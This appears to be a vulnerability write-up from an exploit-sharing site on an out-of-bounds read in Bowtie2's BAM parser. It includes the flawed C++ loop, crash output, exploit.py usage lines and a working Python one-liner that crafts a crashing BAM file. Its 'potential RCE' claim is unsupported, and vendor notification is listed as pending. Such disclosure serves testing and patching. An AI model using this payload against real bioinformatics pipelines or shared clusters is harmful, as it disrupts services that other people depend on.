Share
## https://sploitus.com/exploit?id=762F833A-79A5-507E-9C3B-31C59020E028
# CVE-2026-XXXXX: Bowtie2 Out-of-Bounds Read via Crafted BAM

## Overview

| Field | Value |
|-------|-------|
| **Product** | Bowtie2 |
| **Vendor** | BenLangmead |
| **Versions** | 0 through 2.5.4 (all versions) |
| **Type** | Out-of-bounds Read (CWE-125) |
| **CVSS 4.0** | 8.7 High |
| **Impact** | Denial of Service / Information Disclosure |
| **bio.tools** | https://bio.tools/bowtie2 |

## Vulnerability

Bowtie2's BAM file parser in `pat.cpp` reads the `nref` (number of reference sequences) field from BAM headers and uses it directly as a loop counter without validating it against the actual buffer size. A crafted BAM file with a large `nref` value causes the parser to read far beyond the allocated buffer, resulting in a segmentation fault (SIGSEGV).

```cpp
// pat.cpp:1376-1381
memcpy(&nref, &alignment_batch[0] + i, sizeof(nref));
i += sizeof(nref);
for (uint32_t j = 0; j < nref; j++) {       // nref from untrusted file!
    uint32_t l_name;
    memcpy(&l_name, &alignment_batch[0] + i, sizeof(l_name)); // OOB READ
    i = i + sizeof(l_name) + l_name + sizeof(uint32_t);       // i grows unbounded
}
```

## Crash Evidence

```
$ bowtie2 -x ref_idx -b crafted.bam --no-head
Segmentation fault (core dumped)
$ echo $?
139
```

## Impact

- **Denial of Service**: Guaranteed crash via SIGSEGV
- **Information Disclosure**: OOB read can leak adjacent heap memory
- **Potential RCE**: In specific heap layouts, chaining with write primitive

## Attack Surfaces

1. **Bioinformatics pipelines** processing untrusted BAM files
2. **Shared HPC clusters** where users share BAM files
3. **Web-based genomics platforms** accepting BAM uploads
4. **Galaxy Project** workflows with BAM input

## Usage

```bash
# Check if bowtie2 is vulnerable
python3 exploit.py --bt2 ./bowtie2 --index ref_idx --mode check

# Deliver crash payload
python3 exploit.py --bt2 ./bowtie2 --index ref_idx --mode crash

# Information disclosure analysis
python3 exploit.py --bt2 ./bowtie2 --index ref_idx --mode info

# Save crash BAM for manual testing
python3 exploit.py --bt2 ./bowtie2 --index ref_idx --save-bam crash.bam
```

### Quick Manual Test

```bash
python3 -c "
import struct, zlib
bam = b'BAM\x01' + struct.pack('<II', 0, 1000000) + b'\x00'*20
c = zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15)
cd = c.compress(bam) + c.flush()
crc = zlib.crc32(bam) & 0xFFFFFFFF
hdr = struct.pack('<BBBBIBBH', 31,139,8,4,0,0,255,6)
ext = struct.pack('<BBHH', 66,67,2,len(cd)+25)
ftr = struct.pack('<II', crc, len(bam))
eof = bytes.fromhex('1f8b08040000000000ff0600424302001b0003000000000000000000')
open('crash.bam','wb').write(hdr+ext+cd+ftr+eof)
"
bowtie2 -x ref_idx -b crash.bam --no-head
# Expected: Segmentation fault (exit 139)
```

## Root Cause

The BAM header parser trusts all size fields from the file without validation:

1. `l_text` (header text length) - no bounds check
2. `nref` (number of references) - **no bounds check** (this vulnerability)
3. `l_name` (reference name length) - no bounds check

Each iteration of the nref loop reads ~12 bytes from the buffer. With `nref=1000000`, the parser attempts to read ~12MB beyond the actual buffer, hitting unmapped memory pages and crashing.

## Timeline

| Date | Event |
|------|-------|
| 2026-05-30 | Vulnerability discovered |
| 2026-05-30 | CVE requested from MITRE |
| TBD | CVE ID assigned |
| TBD | Vendor notification |
| TBD | Public disclosure (90 days after vendor notification) |

## Disclaimer

This exploit is provided for **authorized security testing** and **educational purposes** only. Only use on systems you have explicit permission to test.

## License

MIT